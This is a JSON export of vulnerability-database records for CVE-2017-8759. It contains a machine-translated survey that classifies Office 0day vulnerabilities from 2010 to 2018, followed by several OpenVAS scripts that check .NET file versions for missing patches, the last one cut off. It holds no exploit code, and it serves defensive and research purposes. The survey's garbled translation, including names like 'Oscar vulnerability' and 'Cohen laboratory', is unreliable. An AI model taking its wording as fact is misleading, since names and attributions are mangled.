"http://www.myhack58.com/Article/html/3/62/2017/89251.htm", "title": "A newline character causes the Oscar vulnerability 0day(CVE-2017-8759)reproduction-latest Office the highest level of threat attack warning-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:25:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040980", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811322", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040980)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040980)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811322\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 14:11:50 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040980)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040980\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040980\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp( win7:2, win7x64:2, win2008r2:2 ) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ##.NET Framework 3.5.1 for Windows Server 2012: September 12, 2017\n if(version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8769\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 2.0.50727.8000 - 2.0.50727.8769' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:24:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040974", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811326", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811326", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040974)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040974)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811326\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 15:24:00 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040974)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040974\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.5.2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040974\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 4.5.2 for Windows 8.1 and Windows Server 2012 R2: September 12, 2017\n if(version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36410\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 4.0.30319.36000 - 4.0.30319.36410' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing a critical security\n update according to Microsoft Security Updates KB4040972 and KB4040971.", "modified": "2019-12-20T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310811828", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811828", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040972 and KB4040971)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040972 and KB4040971)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811828\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 11:19:26 +0530 (Thu, 14 Sep 2017)\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040972 and KB4040971)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security Updates KB4040972 and KB4040971.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw exists due to Microsoft .NET Framework\n processes untrusted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to take control of an affected system. An attacker could then install\n programs, view, change, or delete data, or create new accounts with full user\n rights. Users whose accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate with administrative user\n rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft .NET Framework 4.6\n\n - Microsoft .NET Framework 4.6.1\n\n - Microsoft .NET Framework 4.6.2\n\n - Microsoft .NET Framework 4.7\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040972\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040971\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040972\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win2012:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n sysdllVer = fetch_file_version(sysPath:dotPath, file_name:\"system.dll\");\n if(!sysdllVer){\n exit(0);\n }\n\n ## .NET Framework 4.6/4.6.1/4.6.2/4.7 for Windows 8.1, Windows Server 2012 R2 and Windows Server 2012\n if(version_in_range(version:sysdllVer, test_version:\"4.6\", test_version2:\"4.7.2113\"))\n {\n report = 'File checked: ' + dotPath + \"\\system.dll\" + '\\n' +\n 'File version: ' + sysdllVer + '\\n' +\n 'Vulnerable range: 4.6 - 4.7.2113\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:20:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040979", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811816", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811816", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040979)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040979)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811816\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 09:32:37 +0530 (Wed, 13 Sep 2017)\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040979)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040979\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an improper\n processing of untrusted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n an attacker to take control of an affected system. An attacker could then\n install programs, view, change, or delete data, or create new accounts with\n full user rights. Users whose accounts are configured to have fewer user rights\n on the system could be less impacted than users who operate with administrative\n user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5 on Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040979\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\nforeach item (registry_enum_keys(key:key))\n{\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n sysdllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.management.dll\");\n if(sysdllVer)\n {\n ## .NET Framework 3.5\n if(version_in_range(version:sysdllVer, test_version:\"2.0.50727.5700\", test_version2:\"2.0.50727.8765\"))\n {\n report = 'File checked: ' + dotPath + \"\\System.management.dll\" + '\\n' +\n 'File version: ' + sysdllVer + '\\n' +\n 'Vulnerable range: 2.0.50727.5700 - 2.0.50727.8765\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing a critical security\n update according to Microsoft Security Updates KB4040973.", "modified": "2019-12-20T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310811827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811827", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040973)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040973)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811827\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 10:52:54 +0530 (Thu, 14 Sep 2017)\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040973)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security Updates KB4040973.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw exists as when Microsoft .NET Framework\n processes untrusted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to take control of an affected system. An attacker could then install\n programs, view, change, or delete data, or create new accounts with full user\n rights. Users whose accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate with administrative user\n rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft .NET Framework 4.6/4.6.1\n\n - Microsoft .NET Framework 4.6.2\n\n - Microsoft .NET Framework 4.7\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040973\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n sysdllVer = fetch_file_version(sysPath:dotPath, file_name:\"system.dll\");\n if(!sysdllVer){\n exit(0);\n }\n\n ## .NET Framework 4.6 for Windows Server 2008 SP2\n if(hotfix_check_sp(win2008:3) > 0)\n {\n ## brkVer == \"4.6.00081\" is to confirm .net version 4.6\n key1 = \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Client\\\";\n brkVer = registry_get_sz(key:key1, item:\"Version\");\n\n if((brkVer == \"4.6.00081\") && sysdllVer 